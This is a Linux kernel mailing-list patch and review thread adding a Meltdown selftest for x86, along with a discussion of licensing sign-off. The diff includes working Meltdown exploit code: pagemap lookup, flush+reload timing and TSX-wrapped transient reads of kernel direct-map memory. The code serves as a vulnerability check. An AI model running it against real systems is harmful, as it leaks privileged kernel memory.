[RFC,v3] selftest/x86/meltdown: Add a selftest for meltdown

Message ID Y3L2Jx3Kx9q8Dv55@ziqianlu-desk1
State New

Commit Message

Aaron Lu Nov. 15, 2022, 2:15 a.m. UTC
  To catch potential programming errors such as mistakenly setting the
Global bit on kernel page table entries, add a selftest for meltdown.

This selftest is based on https://github.com/IAIK/meltdown. The test
first places a predefined string at a random user address and then uses
pagemap to get the physical address of that string. Finally, it tries to
fetch the data through the kernel's direct map address for that physical
address to see if user space can use the kernel's page table.
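
The pagemap step can be sketched in isolation. The helper below is only
an illustration, not the code in this patch: the name
pagemap_entry_to_phys and the SKETCH_/PM_ constants are hypothetical, and
it assumes 4KiB pages and the pagemap entry layout used by the patch
(bit 63 = page present, bits 0-54 = PFN). It decodes one 64-bit entry that
has already been read from /proc/self/pagemap.

```c
#include <stdint.h>

#define SKETCH_PAGE_SHIFT 12                       /* assumes 4KiB pages */
#define SKETCH_PAGE_SIZE  (1ULL << SKETCH_PAGE_SHIFT)
#define PM_PRESENT        (1ULL << 63)             /* page present in RAM */
#define PM_PFN_MASK       ((1ULL << 55) - 1)       /* bits 0-54 hold the PFN */

/*
 * Hypothetical helper: turn one pagemap entry plus the virtual address it
 * describes into a physical address. Returns 0 on success, -1 if the page
 * is not present or the PFN is hidden (it reads as 0 without CAP_SYS_ADMIN).
 */
static int pagemap_entry_to_phys(uint64_t entry, uint64_t virt, uint64_t *phys)
{
	uint64_t pfn;

	if (!(entry & PM_PRESENT))
		return -1;

	pfn = entry & PM_PFN_MASK;
	if (pfn == 0)
		return -1;

	/* Frame base plus the offset of the byte inside its page. */
	*phys = (pfn << SKETCH_PAGE_SHIFT) | (virt & (SKETCH_PAGE_SIZE - 1));
	return 0;
}
```

The entry for a virtual address sits at file offset
(virt >> 12) * 8 in pagemap, which is the offset the patch passes to
pread().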

Per my tests, this test works well on CPUs that have TSX support. For
this reason, the selftest only runs on CPUs that support TSX.

This test requires knowledge of the direct map base. IAIK used the
following two methods to get the direct map base:
1. through a kernel module that shows phys_to_virt(0);
2. by exploiting the same HW vulnerability to guess the base.
Method 1 makes running this selftest complex, while method 2 is not
reliable and I do not want to use a possibly wrong value to run this
test. Suggestions are welcome.
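
For reference, get_directmap_base() in this patch reads the first address
listed after a "Kernel Mapping" heading in
/sys/kernel/debug/page_tables/kernel and rounds it down to a 1GiB (PUD)
boundary. A minimal sketch of that parsing and of the resulting address
arithmetic follows. The helper names and SKETCH_ constants are
hypothetical, and the only assumption about the file format is the one
the patch's sscanf() already makes: an entry line starts with a
hexadecimal address.

```c
#include <stdint.h>
#include <stdio.h>

#define SKETCH_PUD_SHIFT 30
#define SKETCH_PUD_MASK  (~((1ULL << SKETCH_PUD_SHIFT) - 1))

/*
 * Hypothetical helper: parse the leading "0x..." address of one page table
 * dump line and round it down to a 1GiB boundary.
 * Returns 0 on success, -1 if the line does not start with a hex address.
 */
static int parse_directmap_base(const char *line, uint64_t *base)
{
	unsigned long long addr;

	if (sscanf(line, "0x%llx", &addr) != 1)
		return -1;

	*base = addr & SKETCH_PUD_MASK;
	return 0;
}

/* Direct map alias of a physical address: a plain offset from the base. */
static uint64_t directmap_virt(uint64_t base, uint64_t phys)
{
	return base + phys;
}
```

Given an illustrative line (not captured output) that starts with
0xffff888000001000, the parsed base is 0xffff888000000000, and physical
address 0x1234abc maps to 0xffff888001234abc.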

Tested on both x86_64 and i386_pae VMs on a host with an i7-7700K CPU;
the success rate is about 50% when the nopti kernel cmdline is used.
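
Because a single attempt is not reliable, read_phys_memory() in this
patch is written to repeat the measurement and keep the byte value seen
most often. The voting step can be sketched on its own as below.
most_frequent_byte is a hypothetical name, and 0 stands for "nothing
recovered", as it does in the patch.

```c
#include <stddef.h>

/*
 * Hypothetical helper: given the byte values recovered by repeated attempts
 * (0 meaning the attempt recovered nothing), return the non-zero value seen
 * most often, or 0 if every attempt failed. Ties go to the smaller value.
 */
static int most_frequent_byte(const unsigned char *samples, size_t n)
{
	unsigned int votes[256] = { 0 };
	unsigned int best_votes = 0;
	int best = 0;
	size_t i;
	int v;

	for (i = 0; i < n; i++)
		votes[samples[i]]++;

	/* Start at 1: slot 0 only counts failed attempts. */
	for (v = 1; v < 256; v++) {
		if (votes[v] > best_votes) {
			best_votes = votes[v];
			best = v;
		}
	}

	return best;
}
```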

As for legal stuff:

Add an Intel copyright notice because of a significant contribution to
this code. This also makes it clear who did the relicensing from Zlib
to GPLv2.

Also, just to be crystal clear, I have included my Signed-off-by on this
contribution because I certify that (from submitting-patches.rst):

   (b) The contribution is based upon previous work that, to the best
       of my knowledge, is covered under an appropriate open source
       license and I have the right under that license to submit that
       work with modifications, whether created in whole or in part
       by me, under the same open source license (unless I am
       permitted to submit under a different license), as indicated
       in the file; or

In this case, I have the right under the license to submit this work.
That license also permits me to relicense to GPLv2 and submit under the
new license.

I came to the conclusion that this work is OK to submit with all of the
steps I listed above (copyright notices, license terms and relicensing)
by strictly following all of the processes required by my employer.

This does not include a Signed-off-by from a corporate attorney.
Instead, I offer the next best thing: an ack from one of the maintainers
of this code who can also attest to this having followed all of the
proper processes of our employer.

[dhansen: advice on changelog of the legal part]
Signed-off-by: Aaron Lu <aaron.lu@intel.com>
Acked-by: Dave Hansen <dave.hansen@linux.intel.com> # Intel licensing process
---
v3: address legal concerns raised by Greg KH by adding an Intel
copyright notice to the header and explaining it in the changelog; no code change.

 tools/testing/selftests/x86/Makefile   |   2 +-
 tools/testing/selftests/x86/meltdown.c | 420 +++++++++++++++++++++++++
 2 files changed, 421 insertions(+), 1 deletion(-)
 create mode 100644 tools/testing/selftests/x86/meltdown.c
  

Comments

Greg KH Nov. 15, 2022, 6:54 a.m. UTC | #1
On Tue, Nov 15, 2022 at 10:15:03AM +0800, Aaron Lu wrote:
> I came to the conclusion that this work is OK to submit with all of the
> steps I listed above (copyright notices, license terms and relicensing)
> by strictly following all of the processes required by my employer.
> 
> This does not include a Signed-off-by from a corporate attorney.

Please get that, as that is what I asked for in order for us to be able
to accept this type of change.

thanks,

greg k-h
  
Dave Hansen Nov. 16, 2022, 10:57 p.m. UTC | #2
On 11/14/22 22:54, Greg KH wrote:
> On Tue, Nov 15, 2022 at 10:15:03AM +0800, Aaron Lu wrote:
>> I came to the conclusion that this work is OK to submit with all of the
>> steps I listed above (copyright notices, license terms and relicensing)
>> by strictly following all of the processes required by my employer.
>>
>> This does not include a Signed-off-by from a corporate attorney.
> Please get that, as that is what I asked for in order for us to be able
> to accept this type of change.

Hi Greg,

Can you share any more of what triggered this new requirement?

We can, for instance, be flexible on the license that this is submitted
with (original zlib versus GPLv2).  I've also been in contact with the
(presumed) original authors of this code in the past.  If there are
concerns about its provenance, I'd be happy to try to work with them to
get it in to shape.

But, I feel like I'm poking around in the dark here.  I'm not quite sure
what triggered this new requirement or quite how to remedy it.

I'm also a _bit_ worried that I as a maintainer was about to do
something wrong here.  Personally, I'm quite happy with Aaron's due
diligence here and I was *really* close to merging this code.  Is there
some documentation that could be improved here?
  
Greg KH Nov. 17, 2022, 6:10 a.m. UTC | #3
On Wed, Nov 16, 2022 at 02:57:22PM -0800, Dave Hansen wrote:
> On 11/14/22 22:54, Greg KH wrote:
> > On Tue, Nov 15, 2022 at 10:15:03AM +0800, Aaron Lu wrote:
> >> I came to the conclusion that this work is OK to submit with all of the
> >> steps I listed above (copyright notices, license terms and relicensing)
> >> by strictly following all of the processes required by my employer.
> >>
> >> This does not include a Signed-off-by from a corporate attorney.
> > Please get that, as that is what I asked for in order for us to be able
> > to accept this type of change.
> 
> Hi Greg,
> 
> Can you share any more of what triggered this new requirement?

You are taking source from a non-Intel developer under a different
license and adding copyright and different license information to it.
Because of all of that, I have the requirement that I want to know that
Intel legal has vetted all of this and agrees with the conclusions that
you all are stating.

This isn't a new type of requirement, I make this request to many other
companies that do things that are not "normal" when it comes to licenses
and copyrights so as to ensure that all is ok.

thanks,

greg k-h
  
Dave Hansen Nov. 17, 2022, 6:43 p.m. UTC | #4
On 11/16/22 22:10, Greg KH wrote:
> On Wed, Nov 16, 2022 at 02:57:22PM -0800, Dave Hansen wrote:
>> On 11/14/22 22:54, Greg KH wrote:
>>> On Tue, Nov 15, 2022 at 10:15:03AM +0800, Aaron Lu wrote:
>>>> I came to the conclusion that this work is OK to submit with all of the
>>>> steps I listed above (copyright notices, license terms and relicensing)
>>>> by strictly following all of the processes required by my employer.
>>>>
>>>> This does not include a Signed-off-by from a corporate attorney.
>>> Please get that, as that is what I asked for in order for us to be able
>>> to accept this type of change.
>> Hi Greg,
>>
>> Can you share any more of what triggered this new requirement?
> You are taking source from a non-Intel developer under a different
> license and adding copyright and different license information to it.
> Because of all of that, I have the requirement that I want to know that
> Intel legal has vetted all of this and agrees with the conclusions that
> you all are stating.

I rarely speak "for Intel".  But, this is one case where I believe that
I can.  The Intel processes have been thoroughly and diligently followed
here.  Speaking for Intel: yes, this has been vetted and those
statements are as official as a statement from Intel can be.

Also, to reiterate my earlier offer: I believe Aaron can be flexible in
both the license under which this is submitted and the presence of an
explicit Intel copyright notice.  If modifications there would help ease
your concerns, we'd be happy to explore changes.

I also recognize that there can be legitimate differences of opinion
about what constitutes a 'valid' licensing decision.  It's quite
possible that the advice we're getting from folks at Intel differs from the
advice that others get.  If that's happening, I'd love to find a way
forward that allows that legitimate difference of opinion to persist
while also getting a selftest in the kernel that I believe will find
real bugs.
  

Patch

diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile
index 0388c4d60af0..36f99c360a56 100644
--- a/tools/testing/selftests/x86/Makefile
+++ b/tools/testing/selftests/x86/Makefile
@@ -13,7 +13,7 @@  CAN_BUILD_WITH_NOPIE := $(shell ./check_cc.sh "$(CC)" trivial_program.c -no-pie)
 TARGETS_C_BOTHBITS := single_step_syscall sysret_ss_attrs syscall_nt test_mremap_vdso \
 			check_initial_reg_state sigreturn iopl ioperm \
 			test_vsyscall mov_ss_trap \
-			syscall_arg_fault fsgsbase_restore sigaltstack
+			syscall_arg_fault fsgsbase_restore sigaltstack meltdown
 TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \
 			test_FCMOV test_FCOMI test_FISTTP \
 			vdso_restorer
diff --git a/tools/testing/selftests/x86/meltdown.c b/tools/testing/selftests/x86/meltdown.c
new file mode 100644
index 000000000000..0ad4b65adcd0
--- /dev/null
+++ b/tools/testing/selftests/x86/meltdown.c
@@ -0,0 +1,420 @@ 
+// SPDX-License-Identifier: GPL-2.0-only
+/*
+ * Copyright (c) 2022 Intel
+ *
+ * This selftest is based on code from https://github.com/IAIK/meltdown
+ * and can be used to check if user space can read data through kernel
+ * page table entries.
+ *
+ * Note for the i386 test: because the kernel prefers high memory for user
+ * programs, available memory must be restricted to less than the low memory
+ * size (about 896MiB) so that the memory hosting "string" in test_meltdown()
+ * is directly mapped.
+ *
+ * Note for both x86_64 and i386 tests: the hardware race window cannot be
+ * exploited every time, so a single run of the test on a vulnerable system
+ * may not FAIL. My tests on an i7-7700K CPU have a success rate of about 50%.
+ *
+ * The original copyright and license information are shown below:
+ *
+ * Copyright (c) 2018 meltdown
+ *
+ * This software is provided 'as-is', without any express or implied
+ * warranty. In no event will the authors be held liable for any damages
+ * arising from the use of this software.
+ *
+ * Permission is granted to anyone to use this software for any purpose,
+ * including commercial applications, and to alter it and redistribute it
+ * freely, subject to the following restrictions:
+ *
+ *    1. The origin of this software must not be misrepresented; you must not
+ *    claim that you wrote the original software. If you use this software
+ *    in a product, an acknowledgment in the product documentation would be
+ *    appreciated but is not required.
+ *
+ *    2. Altered source versions must be plainly marked as such, and must not be
+ *    misrepresented as being the original software.
+ *
+ *    3. This notice may not be removed or altered from any source
+ *    distribution.
+ */
+
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <cpuid.h>
+#include <errno.h>
+#include <err.h>
+#include <sys/mman.h>
+#include <sys/utsname.h>
+
+#define PAGE_SHIFT	12
+#define PAGE_SIZE	0x1000
+#define PUD_SHIFT	30
+#define PUD_SIZE	(1UL << PUD_SHIFT)
+#define PUD_MASK	(~(PUD_SIZE - 1))
+
+#define _XBEGIN_STARTED	(~0u)
+
+/* configurables */
+#define NR_MEASUREMENTS	3
+#define NR_TRIES	10000
+
+size_t cache_miss_threshold;
+unsigned long directmap_base;
+
+static int get_directmap_base(void)
+{
+	char *buf;
+	FILE *fp;
+	size_t n;
+	int ret;
+
+	fp = fopen("/sys/kernel/debug/page_tables/kernel", "r");
+	if (!fp)
+		return -1;
+
+	buf = NULL;
+	ret = -1;
+	while (getline(&buf, &n, fp) != -1) {
+		if (!strstr(buf, "Kernel Mapping"))
+			continue;
+
+		if (getline(&buf, &n, fp) != -1 &&
+		    sscanf(buf, "0x%lx", &directmap_base) == 1) {
+			printf("[INFO]\tdirectmap_base=0x%lx/0x%lx\n", directmap_base, directmap_base & PUD_MASK);
+			directmap_base &= PUD_MASK;
+			ret = 0;
+			break;
+		}
+	}
+
+	fclose(fp);
+	free(buf);
+	return ret;
+}
+
+/*
+ * Requires root due to pagemap.
+ */
+static int virt_to_phys(unsigned long virt, unsigned long *phys)
+{
+	unsigned long pfn;
+	uint64_t val;
+	int fd, ret;
+
+	fd = open("/proc/self/pagemap", O_RDONLY);
+	if (fd == -1) {
+		printf("[INFO]\tFailed to open pagemap\n");
+		return -1;
+	}
+
+	ret = pread(fd, &val, sizeof(val), (virt >> PAGE_SHIFT) * sizeof(uint64_t));
+	if (ret == -1) {
+		printf("[INFO]\tFailed to read pagemap\n");
+		goto out;
+	}
+
+	if (!(val & (1ULL << 63))) {
+		printf("[INFO]\tPage not present according to pagemap\n");
+		ret = -1;
+		goto out;
+	}
+
+	pfn = val & ((1ULL << 55) - 1);
+	if (pfn == 0) {
+		printf("[INFO]\tNeed CAP_SYS_ADMIN to show pfn\n");
+		ret = -1;
+		goto out;
+	}
+
+	ret = 0;
+	*phys = (pfn << PAGE_SHIFT) | (virt & (PAGE_SIZE - 1));
+
+out:
+	close(fd);
+	return ret;
+}
+
+static uint64_t rdtsc()
+{
+	uint64_t a = 0, d = 0;
+
+	asm volatile("mfence");
+#ifdef __x86_64__
+	asm volatile("rdtsc" : "=a"(a), "=d"(d));
+#else
+	asm volatile("rdtsc" : "=A"(a));
+#endif
+	a = (d << 32) | a;
+	asm volatile("mfence");
+
+	return a;
+}
+
+#ifdef __x86_64__
+static void maccess(void *p)
+{
+	asm volatile("movq (%0), %%rax\n" : : "c"(p) : "rax");
+}
+
+static void flush(void *p)
+{
+	asm volatile("clflush 0(%0)\n" : : "c"(p) : "rax");
+}
+
+#define MELTDOWN					\
+	asm volatile("1:\n"				\
+		     "movzx (%%rcx), %%rax\n"		\
+		     "shl $12, %%rax\n"			\
+		     "jz 1b\n"				\
+		     "movq (%%rbx,%%rax,1), %%rbx\n"	\
+		     :					\
+		     : "c"(virt), "b"(array)		\
+		     : "rax");
+#else
+static void maccess(void *p)
+{
+	asm volatile("movl (%0), %%eax\n" : : "c"(p) : "eax");
+}
+
+static void flush(void *p)
+{
+	asm volatile("clflush 0(%0)\n" : : "c"(p) : "eax");
+}
+
+#define MELTDOWN					\
+	asm volatile("1:\n"				\
+		     "movzx (%%ecx), %%eax\n"		\
+		     "shl $12, %%eax\n"			\
+		     "jz 1b\n"				\
+		     "mov (%%ebx,%%eax,1), %%ebx\n"	\
+		     :					\
+		     : "c"(virt), "b"(array)		\
+		     : "eax");
+#endif
+
+static void detect_flush_reload_threshold()
+{
+	size_t reload_time = 0, flush_reload_time = 0, i, count = 1000000;
+	size_t dummy[16];
+	size_t *ptr = dummy + 8;
+	uint64_t start = 0, end = 0;
+
+	maccess(ptr);
+	for (i = 0; i < count; i++) {
+		start = rdtsc();
+		maccess(ptr);
+		end = rdtsc();
+		reload_time += (end - start);
+	}
+
+	for (i = 0; i < count; i++) {
+		start = rdtsc();
+		maccess(ptr);
+		end = rdtsc();
+		flush(ptr);
+		flush_reload_time += (end - start);
+	}
+
+	reload_time /= count;
+	flush_reload_time /= count;
+
+	printf("[INFO]\tFlush+Reload: %zu cycles, Reload only: %zu cycles\n",
+			flush_reload_time, reload_time);
+	cache_miss_threshold = (flush_reload_time + reload_time * 2) / 3;
+	printf("[INFO]\tFlush+Reload threshold: %zu cycles\n", cache_miss_threshold);
+}
+
+static int flush_reload(void *ptr)
+{
+	uint64_t start, end;
+
+	start = rdtsc();
+	maccess(ptr);
+	end = rdtsc();
+
+	flush(ptr);
+
+	if (end - start < cache_miss_threshold)
+		return 1;
+
+	return 0;
+}
+
+static int check_tsx()
+{
+	if (__get_cpuid_max(0, NULL) >= 7) {
+		unsigned a, b, c, d;
+		__cpuid_count(7, 0, a, b, c, d);
+		return (b & (1 << 11)) ? 1 : 0;
+	} else
+		return 0;
+}
+
+static unsigned int xbegin(void)
+{
+	unsigned int status;
+
+	/* "xbegin 1f; 1:" as raw bytes; issuing the mnemonic too would nest a second transaction */
+	asm volatile(".byte 0xc7,0xf8,0x00,0x00,0x00,0x00" : "=a"(status) : "a"(-1UL) : "memory");
+
+	return status;
+}
+
+static void xend(void)
+{
+	/* "xend" as raw bytes; exactly one xend per xbegin */
+	asm volatile(".byte 0x0f; .byte 0x01; .byte 0xd5" ::: "memory");
+}
+
+static int __read_phys_memory_tsx(unsigned long phys, char *array)
+{
+	unsigned long virt;
+	int i, retries;
+
+	virt = phys + directmap_base;
+	for (retries = 0; retries < NR_TRIES; retries++) {
+		if (xbegin() == _XBEGIN_STARTED) {
+			MELTDOWN;
+			xend();
+		}
+
+		for (i = 1; i < 256; i++) {
+			if (flush_reload(array + i * PAGE_SIZE))
+				return i;
+		}
+	}
+
+	return 0;
+}
+
+/*
+ * Read physical memory by exploiting HW bugs.
+ * One byte a time.
+ */
+static int read_phys_memory(unsigned long phys, char *array)
+{
+	char res_stat[256];
+	int i, j, r, max_v, max_i = 0;
+
+	memset(res_stat, 0, sizeof(res_stat));
+
+	for (i = 0; i < NR_MEASUREMENTS; i++) {
+		for (j = 0; j < 256; j++)
+			flush(array + j * PAGE_SIZE);
+
+		r = __read_phys_memory_tsx(phys, array);
+		if (r != 0)
+			res_stat[r]++;
+	}
+
+	max_v = 0;
+	for (i = 1; i < 256; i++) {
+		if (res_stat[i] > max_v) {
+			max_i = i;
+			max_v = res_stat[i];
+		}
+	}
+
+	if (max_v == 0)
+		return 0;
+
+	return max_i;
+}
+
+#ifdef __i386
+/* 32 bits version is only meant to run on a PAE kernel */
+static int arch_test_mismatch(void)
+{
+	struct utsname buf;
+
+	if (uname(&buf) == -1) {
+		printf("[SKIP]\tCan't decide architecture\n");
+		return 1;
+	}
+
+	if (!strncmp(buf.machine, "x86_64", 6)) {
+		printf("[SKIP]\tNo need to run 32bits test on 64bits host\n");
+		return 1;
+	}
+
+	return 0;
+}
+#else
+static int arch_test_mismatch(void)
+{
+	return 0;
+}
+#endif
+
+static int test_meltdown(void)
+{
+	char string[] = "test string";
+	char *array, *result;
+	unsigned long phys;
+	int i, len, ret;
+
+	if (arch_test_mismatch())
+		return 0;
+
+	if (get_directmap_base() == -1) {
+		printf("[SKIP]\tFailed to get directmap base. Make sure you are root and kernel has CONFIG_PTDUMP_DEBUGFS\n");
+		return 0;
+	}
+
+	detect_flush_reload_threshold();
+
+	if (!check_tsx()) {
+		printf("[SKIP]\tNo TSX support\n");
+		return 0;
+	}
+
+	if (virt_to_phys((unsigned long)string, &phys) == -1) {
+		printf("[FAIL]\tFailed to convert virtual address to physical address\n");
+		return -1;
+	}
+
+	len = strlen(string);
+	result = malloc(len + 1);
+	if (!result) {
+		printf("[FAIL]\tNot enough memory for malloc\n");
+		return -1;
+	}
+	memset(result, 0, len + 1);
+
+	array = mmap(NULL, 256 * PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+	if (array == MAP_FAILED) {
+		printf("[FAIL]\tNot enough memory for mmap\n");
+		free(result);
+		return -1;
+	}
+	memset(array, 0, 256 * PAGE_SIZE);
+
+	for (i = 0; i < len; i++, phys++) {
+		result[i] = read_phys_memory(phys, array);
+		if (result[i] == 0)
+			break;
+	}
+
+	ret = !strncmp(string, result, len);
+	if (ret)
+		printf("[FAIL]\tSystem is vulnerable to meltdown.\n");
+	else
+		printf("[OK]\tSystem might not be vulnerable to meltdown.\n");
+
+	munmap(array, 256 * PAGE_SIZE);
+	free(result);
+
+	return ret;
+}
+
+int main(void)
+{
+	printf("[RUN]\tTest if system is vulnerable to meltdown\n");
+
+	return test_meltdown();
+}